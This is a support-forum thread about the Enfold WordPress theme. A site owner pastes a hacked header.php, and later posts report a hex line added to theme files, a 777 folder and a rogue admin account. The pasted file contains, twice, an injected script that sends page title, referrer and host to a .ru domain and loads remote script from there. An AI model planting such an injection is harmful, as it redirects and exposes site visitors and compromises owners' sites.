Tagged: 

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • October 27, 2015 at 4:48 pm #525597
    ist007

    I have my site getting redirected/ or wait to load http://belgianhouse.ru. I have found the header is changed. Please let me know why this is causing. It seems like some way somebody changing code, See below for the header code. Please help

    <?php
    global $avia_config;

    $style = $avia_config[‘box_class’];
    $responsive = avia_get_option(‘responsive_active’) != “disabled” ? “responsive” : “fixed_layout”;
    $blank = isset($avia_config[‘template’]) ? $avia_config[‘template’] : “”;
    $av_lightbox= avia_get_option(‘lightbox_active’) != “disabled” ? ‘av-default-lightbox’ : ‘av-custom-lightbox’;
    $preloader = avia_get_option(‘preloader’) == “preloader” ? ‘av-preloader-active av-preloader-enabled’ : ‘av-preloader-disabled’;

    ?><!DOCTYPE html>
    <html <?php language_attributes(); ?> class=”<?php echo ” html_{$style} “.$responsive.” “.$preloader.” “.$av_lightbox.” “.avia_header_class_string();?> “>
    <head>
    <meta charset=”<?php bloginfo( ‘charset’ ); ?>” />

    <!– page title, displayed in your browser bar –>
    <title><?php if(function_exists(‘avia_set_title_tag’)) { echo avia_set_title_tag(); } ?></title>

    <?php
    /*
    * outputs a rel=follow or nofollow tag to circumvent google duplicate content for archives
    * located in framework/php/function-set-avia-frontend.php
    */
    if (function_exists(‘avia_set_follow’)) { echo avia_set_follow(); }

    /*
    * outputs a favicon if defined
    */
    if (function_exists(‘avia_favicon’)) { echo avia_favicon(avia_get_option(‘favicon’)); }
    ?>

    <!– mobile setting –>
    <?php

    if( strpos($responsive, ‘responsive’) !== false ) echo ‘<meta name=”viewport” content=”width=device-width, initial-scale=1, maximum-scale=1″>’;
    ?>

    <!– Scripts/CSS and wp_head hook –>
    <?php
    /* Always have wp_head() just before the closing
    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://belgianhouse.ru/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
    </head>
    * tag of your theme, or you will break many plugins, which
    * generally use this hook to add elements to <head> such
    * as styles, scripts, and meta tags.
    */

    wp_head();

    ?>

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://belgianhouse.ru/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
    </head>

    <body id=”top” <?php body_class($style.” “.$avia_config[‘font_stack’].” “.$blank); avia_markup_helper(array(‘context’ => ‘body’)); ?>>

    <?php

    if(“av-preloader-active av-preloader-enabled” === $preloader)
    {
    echo avia_preload_screen();
    }

    ?>

    <div id=’wrap_all’>

    <?php
    if(!$blank) //blank templates dont display header nor footer
    {
    //fetch the template file that holds the main menu, located in includes/helper-menu-main.php
    get_template_part( ‘includes/helper’, ‘main-menu’ );

    } ?>

    <div id=’main’ data-scroll-offset='<?php echo avia_header_setting(‘header_scroll_offset’); ?>’>

    <?php do_action(‘ava_after_main_container’); ?>

    October 28, 2015 at 1:00 pm #526058
    Ismael

    Hey ist007!

    Thank you for using Enfold.

    The header.php file is changed? Please try to override the header.php file with a fresh copy then post the login details here. We would like to check it.

    Regards,
    Ismael

    February 6, 2016 at 6:01 pm #579029
    comkapi

    Hello,
    i just find an hexadecimal line added to the top of these 2 files :
    – framework/php/function-set-avia-frontend.php
    – framework/php/class-framework-widgets.php
    as in your header file some functions are included from function-set-avia-frontend.php it can be the same origin
    i also find a malicious file in the uploads/dynamic-avia folder (777 instead of 755)
    see https://kriesi.at/support/topic/dynamic-avia-folder-has-permissions-set-to-777/#post-325278
    and an administrator profile (user “backup”) have been created directly in data base…
    Some hackers seems to well know Enfold theme…

    February 9, 2016 at 9:25 am #580223
    Ismael

    Hey!

    The theme actually sets the uploads/dynamic-avia folder to 777 by default as discussed on the previous thread. Please change the database’s, wp’s, ftp’s login credentials.

    Best regards,
    Ismael

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.